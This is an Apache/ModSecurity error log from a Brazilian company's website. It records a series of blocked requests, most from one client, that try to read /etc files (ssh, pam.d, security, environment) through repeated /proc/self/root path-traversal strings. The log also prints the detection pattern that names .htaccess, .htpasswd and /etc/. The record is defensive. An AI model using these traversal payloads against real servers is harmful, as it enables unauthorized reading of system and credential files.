[Tue Mar 17 10:29:42.083566 2026] [:error] [pid 17965:tid 140411565680384] [client 74.7.243.203:34406] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXRqt8Nd0UC_OcbVG0yAAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:30:09.116118 2026] [:error] [pid 2473:tid 140411658000128] [client 74.7.243.203:40338] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXYaBJNF7axNlVR0UDCQAAAAo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:30:24.278027 2026] [:error] [pid 18380:tid 140411674785536] [client 74.7.243.203:48032] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXcK4xEDsg_V3ESNY5NwAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:30:32.314328 2026] [:error] [pid 18604:tid 140411708356352] [client 74.7.243.203:56814] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXeEBd0UqwxWindINt3AAAA0Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:30:33.599540 2026] [:error] [pid 2325:tid 140411716749056] [client 74.7.243.203:46246] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/environment"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXee82sZHvlq4xgHrI1wAAAoM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:30:35.597025 2026] [:error] [pid 1731:tid 140411658000128] [client 74.7.243.203:46260] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXegb2qCuy5irgBMjObwAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:30:37.153264 2026] [:error] [pid 1731:tid 140411582465792] [client 74.7.243.203:46272] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXfQb2qCuy5irgBMjOcAAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:30:38.343752 2026] [:error] [pid 2473:tid 140411733534464] [client 74.7.243.203:46278] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXfqBJNF7axNlVR0UDDwAAAAE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:30:39.654618 2026] [:error] [pid 2473:tid 140411649607424] [client 74.7.243.203:46286] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXf6BJNF7axNlVR0UDEQAAAAs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:30:40.846337 2026] [:error] [pid 18380:tid 140411733534464] [client 74.7.243.203:56202] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXgK4xEDsg_V3ESNY5PAAAAgE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:30:42.214431 2026] [:error] [pid 18709:tid 140411699963648] [client 74.7.243.203:56216] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXgjarLhPAjZGI1b2z4wAAA4U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:30:46.999144 2026] [:error] [pid 1731:tid 140411691570944] [client 74.7.243.203:56226] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXhgb2qCuy5irgBMjOeQAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:30:48.328791 2026] [:error] [pid 2325:tid 140411540502272] [client 74.7.243.203:56238] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXiO82sZHvlq4xgHrI4wAAApg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:30:49.485872 2026] [:error] [pid 7437:tid 140411683178240] [client 74.7.243.203:56244] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXiQeiSKl8TjouI-YHqQAAA8c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:30:50.807283 2026] [:error] [pid 18604:tid 140411683178240] [client 74.7.243.203:38100] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXikBd0UqwxWindINt3wAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:30:51.998261 2026] [:error] [pid 18709:tid 140411565680384] [client 74.7.243.203:38110] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXizarLhPAjZGI1b2z5QAAA5U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:30:53.335180 2026] [:error] [pid 11293:tid 140411725141760] [client 74.7.243.203:38124] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXjdCmCSWTlPouqorRsAAAAMI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:30:55.657179 2026] [:error] [pid 2325:tid 140411741927168] [client 74.7.243.203:38128] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXj-82sZHvlq4xgHrI6wAAAoA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:31:10.627855 2026] [:error] [pid 1731:tid 140411741927168] [client 74.7.228.16:60402] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablXngb2qCuy5irgBMjOfAAAAEA"]
[Tue Mar 17 10:31:18.191733 2026] [:error] [pid 7437:tid 140411733534464] [client 74.7.243.203:38130] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXpgeiSKl8TjouI-YHugAAA8E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:31:21.538892 2026] [:error] [pid 11293:tid 140411624429312] [client 74.7.243.203:58656] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXqdCmCSWTlPouqorRzAAAAM4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:31:22.836230 2026] [:error] [pid 18380:tid 140411691570944] [client 74.7.243.203:58112] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablXqq4xEDsg_V3ESNY5RQAAAgY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
